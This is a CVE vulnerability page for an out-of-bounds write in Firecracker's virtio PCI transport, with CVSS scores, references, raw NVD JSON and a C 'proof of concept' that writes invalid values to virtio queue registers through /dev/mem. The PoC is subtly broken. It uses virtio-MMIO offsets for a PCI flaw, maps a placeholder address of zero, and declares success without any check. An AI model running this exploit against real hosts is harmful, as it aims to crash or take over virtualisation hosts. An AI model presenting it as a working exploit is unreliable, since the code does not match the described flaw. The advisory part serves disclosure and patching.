Security Vulnerability Report
CVE-2026-5747 CVSS 7.5 HIGH

CVE-2026-5747

Published: 2026-04-08 00:16:06
Last Modified: 2026-04-20 16:16:50
Source: ff89ba41-3aa1-4d27-914a-91399e9639e5

Description

An out-of-bounds write issue in the virtio PCI transport in Firecracker 1.13.0 through 1.14.3 and 1.15.0 on x86_64 and aarch64 might allow a local guest user with root privileges to crash the Firecracker VMM process or potentially execute arbitrary code on the host via modification of virtio queue configuration registers after device activation. Achieving code execution on the host requires additional preconditions, such as the use of a custom guest kernel or specific snapshot configurations. To remediate this, users should upgrade to Firecracker 1.14.4 or 1.15.1 and later.

CVSS Details

CVSS Score: 7.5
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Firecracker 1.13.0 - 1.14.3
Firecracker 1.15.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
c
/*
 * Conceptual PoC for CVE-2026-5747
 * This code attempts to trigger the out-of-bounds write
 * by modifying virtio queue configuration registers.
 * Requires root privileges within the guest VM.
 */
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/mman.h>
#include <fcntl.h>

/* Register offsets taken from the virtio-MMIO register layout */
#define VIRTIO_MMIO_QUEUE_SEL    0x030
#define VIRTIO_MMIO_QUEUE_NOTIFY 0x050

// Function to map device memory (simplified)
void* map_device_memory(off_t base_addr) {
    int mem_fd = open("/dev/mem", O_RDWR | O_SYNC);
    if (mem_fd < 0) {
        perror("Failed to open /dev/mem (requires root)");
        return NULL;
    }
    void* mapped = mmap(NULL, 0x1000, PROT_READ | PROT_WRITE, MAP_SHARED, mem_fd, base_addr);
    close(mem_fd);
    // mmap reports failure as MAP_FAILED, not NULL
    if (mapped == MAP_FAILED) {
        perror("mmap");
        return NULL;
    }
    return mapped;
}

int main(void) {
    printf("[+] Attempting to trigger CVE-2026-5747...\n");

    // Assuming the base address of the virtio device (hypervisor specific)
    off_t device_base = 0x00000000;
    volatile unsigned int* virtio_regs = (volatile unsigned int*)map_device_memory(device_base);
    if (!virtio_regs) {
        return -1;
    }

    // Trigger condition: Modify queue configuration after activation
    // This specific sequence attempts to corrupt memory via out-of-bounds write
    printf("[+] Modifying virtio queue registers...\n");

    // Writing out of bounds values to queue selection/notify
    virtio_regs[VIRTIO_MMIO_QUEUE_SEL/4] = 0xFFFF; // Invalid queue index
    virtio_regs[VIRTIO_MMIO_QUEUE_NOTIFY/4] = 0xFFFFFFFF;

    printf("[+] Exploit triggered. Check Host VMM status.\n");
    return 0;
}

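References

https://aws.amazon.com/security/security-bulletins/2026-015-aws/
https://github.com/firecracker-microvm/firecracker/releases/tag/v1.14.4
https://github.com/firecracker-microvm/firecracker/releases/tag/v1.15.1
https://github.com/firecracker-microvm/firecracker/security/advisories/GHSA-776c-mpj7-jm3r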

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-5747", "sourceIdentifier": "ff89ba41-3aa1-4d27-914a-91399e9639e5", "published": "2026-04-08T00:16:05.657", "lastModified": "2026-04-20T16:16:49.780", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "An out-of-bounds write issue in the virtio PCI transport in Firecracker 1.13.0 through 1.14.3 and 1.15.0 on x86_64 and aarch64 might allow a local guest user with root privileges to crash the Firecracker VMM process or potentially execute arbitrary code on the host via modification of virtio queue configuration registers after device activation. Achieving code execution on the host requires additional preconditions, such as the use of a custom guest kernel or specific snapshot configurations.\n\nTo remediate this, users should upgrade to Firecracker 1.14.4 or 1.15.1 and later."}], "metrics": {"cvssMetricV40": [{"source": "ff89ba41-3aa1-4d27-914a-91399e9639e5", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:H/AT:P/PR:H/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "HIGH", "attackRequirements": "PRESENT", "privilegesRequired": "HIGH", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "HIGH", "subIntegrityImpact": "HIGH", "subAvailabilityImpact": "HIGH", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", 
"modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "ff89ba41-3aa1-4d27-914a-91399e9639e5", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "HIGH", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 0.8, "impactScore": 6.0}]}, "weaknesses": [{"source": "ff89ba41-3aa1-4d27-914a-91399e9639e5", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-369"}, {"lang": "en", "value": "CWE-787"}]}], "references": [{"url": "https://aws.amazon.com/security/security-bulletins/2026-015-aws/", "source": "ff89ba41-3aa1-4d27-914a-91399e9639e5"}, {"url": "https://github.com/firecracker-microvm/firecracker/releases/tag/v1.14.4", "source": "ff89ba41-3aa1-4d27-914a-91399e9639e5"}, {"url": "https://github.com/firecracker-microvm/firecracker/releases/tag/v1.15.1", "source": "ff89ba41-3aa1-4d27-914a-91399e9639e5"}, {"url": "https://github.com/firecracker-microvm/firecracker/security/advisories/GHSA-776c-mpj7-jm3r", "source": "ff89ba41-3aa1-4d27-914a-91399e9639e5"}]}}